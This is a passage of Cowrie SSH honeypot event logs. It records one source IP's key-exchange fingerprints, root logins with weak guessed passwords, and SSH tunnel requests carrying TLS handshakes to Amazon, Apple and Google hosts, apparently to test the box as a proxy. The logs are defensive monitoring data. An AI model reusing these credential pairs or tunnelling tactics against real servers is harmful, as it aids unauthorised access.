an-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T06:16:32.174916Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Q1w2e3r4","message":"login attempt [root/Q1w2e3r4] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:16:32.669680Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:33.004604Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.session.closed","duration":"97.9","message":"Connection lost after 97.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:33.301599Z","src_ip":"212.227.235.229","session":"592f662fb3d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.171.12.40","dst_port":443,"src_ip":"212.227.235.229","src_port":41840,"message":"direct-tcp connection request to 54.171.12.40:443 from 127.0.0.1:41840","sensor":"my-vps","timestamp":"2025-08-31T06:16:33.570502Z","session":"43ffaf0402a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.171.12.40","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xadq\\xed\\xe1r\\xf0\\x7fG\\t\\x83\\xbb\\n\\xfc\\xad/\\xce\\xc8\\x94\\xda\\x07\\xc0_\\x8a\\xc8$,9\\xfaPA\\xdcw _L\\xd6\\xac:\\x822\\xbe9h\\x05\\xbe.\\xf2b+\\x0e\\xa3m\\x82\\x0c8X\\x13\\xa8\\xc2\\x8c\\xf6(Dn\\x1c\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xbb]\\r\\x8c\\xc6u\\x12ml\\xb4\\xb6~\\x16'\\x80\\xec\\xd4\\x8d\\x14-\\xf3{dg5\\xd9+\\xf5Z]\\xdfE\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.171.12.40:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xadq\\xed\\xe1r\\xf0\\x7fG\\t\\x83\\xbb\\n\\xfc\\xad/\\xce\\xc8\\x94\\xda\\x07\\xc0_\\x8a\\xc8$,9\\xfaPA\\xdcw _L\\xd6\\xac:\\x822\\xbe9h\\x05\\xbe.\\xf2b+\\x0e\\xa3m\\x82\\x0c8X\\x13\\xa8\\xc2\\x8c\\xf6(Dn\\x1c\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xbb]\\r\\x8c\\xc6u\\x12ml\\xb4\\xb6~\\x16'\\x80\\xec\\xd4\\x8d\\x14-\\xf3{dg5\\xd9+\\xf5Z]\\xdfE\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:16:33.682538Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.53.112.242","dst_port":443,"src_ip":"212.227.235.229","src_port":41966,"message":"direct-tcp connection request to 23.53.112.242:443 from 127.0.0.1:41966","sensor":"my-vps","timestamp":"2025-08-31T06:16:33.861018Z","session":"43ffaf0402a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.53.112.242","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf0@\\xb9\\x04:\\xaf\\xa3oQ\\xe5\\xf7\\xeb\\xeb\\xa1\\x88\\xbe.\\xe2\\xf7\\x1c\\x08\\xd2\\xb7\\xdc\\xd3n\\x84\\xf9#\\xce\\x9d\\x03 Q\\xf0\\x12S\\xcd)pypc\\xc0\\x93\\xa3\\x83` \\x05\\x07\\xc7\\xb3\\r\"W\\xac\\x1d)\\x12\\xc6\\xef\\xab\\x1e\\x96\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xf4\\x911\\x04\\x93\\xb8^m\\x08\\xe3\\xbe\\x9d\\xc4\\xcbv\\xa6\\x08\\xbf\\x1d=U\\x00+\\x192\\x83W\\xddI\\xb1\\xbb\\x1c\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.53.112.242:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xf0@\\xb9\\x04:\\xaf\\xa3oQ\\xe5\\xf7\\xeb\\xeb\\xa1\\x88\\xbe.\\xe2\\xf7\\x1c\\x08\\xd2\\xb7\\xdc\\xd3n\\x84\\xf9#\\xce\\x9d\\x03 Q\\xf0\\x12S\\xcd)pypc\\xc0\\x93\\xa3\\x83` \\x05\\x07\\xc7\\xb3\\r\"W\\xac\\x1d)\\x12\\xc6\\xef\\xab\\x1e\\x96\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xf4\\x911\\x04\\x93\\xb8^m\\x08\\xe3\\xbe\\x9d\\xc4\\xcbv\\xa6\\x08\\xbf\\x1d=U\\x00+\\x192\\x83W\\xddI\\xb1\\xbb\\x1c\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T06:16:33.975190Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"216.58.208.100","dst_port":443,"src_ip":"212.227.235.229","src_port":42164,"message":"direct-tcp connection request to 216.58.208.100:443 from 127.0.0.1:42164","sensor":"my-vps","timestamp":"2025-08-31T06:16:34.083530Z","session":"43ffaf0402a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"216.58.208.100","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03*\\xab\\x9axm\\xbaF\\xbc>uF\\xf8\\x1c\\x97j\\xdb9,Ft\\x8a\\x16\\x00\\xd4\\x86\\x9d\\x12\\x0c\\xc4ne! i\\xb1\\xdcq\\xcc{b\\x0cY\\x08\\x82\\xa2\\x01\\xdft\\xaf\\xea\\xbf\\xae\\xda\\x1f\\x11\\xdd\\xc2}pqU\\xdd/p\\xbe\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 .\\n\\x9c.%D\\xce0\\x8f\\x06\\xc4\\x14\\xcd\\xd9\\xae?\\xc6\\xd9-\\xb1\\x17w\\x020\\x80A\\xcfW\\xe3E\\x99-\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 216.58.208.100:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03*\\xab\\x9axm\\xbaF\\xbc>uF\\xf8\\x1c\\x97j\\xdb9,Ft\\x8a\\x16\\x00\\xd4\\x86\\x9d\\x12\\x0c\\xc4ne! i\\xb1\\xdcq\\xcc{b\\x0cY\\x08\\x82\\xa2\\x01\\xdft\\xaf\\xea\\xbf\\xae\\xda\\x1f\\x11\\xdd\\xc2}pqU\\xdd/p\\xbe\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 .\\n\\x9c.%D\\xce0\\x8f\\x06\\xc4\\x14\\xcd\\xd9\\xae?\\xc6\\xd9-\\xb1\\x17w\\x020\\x80A\\xcfW\\xe3E\\x99-\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T06:16:34.210250Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:16:34.310027Z","src_ip":"212.227.235.229","session":"43ffaf0402a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47036,"dst_ip":"1.2.3.4","dst_port":22,"session":"bee9267048eb","protocol":"ssh","message":"New connection: 212.227.235.229:47036 (1.2.3.4:22) [session: bee9267048eb]","sensor":"my-vps","timestamp":"2025-08-31T06:16:42.176846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:16:42.177785Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:16:42.459069Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.login.success","username":"root","password":"Zz12345678","message":"login attempt [root/Zz12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:16:43.628529Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:16:44.205993Z","src_ip":"212.227.235.229","session":"bee9267048eb"}
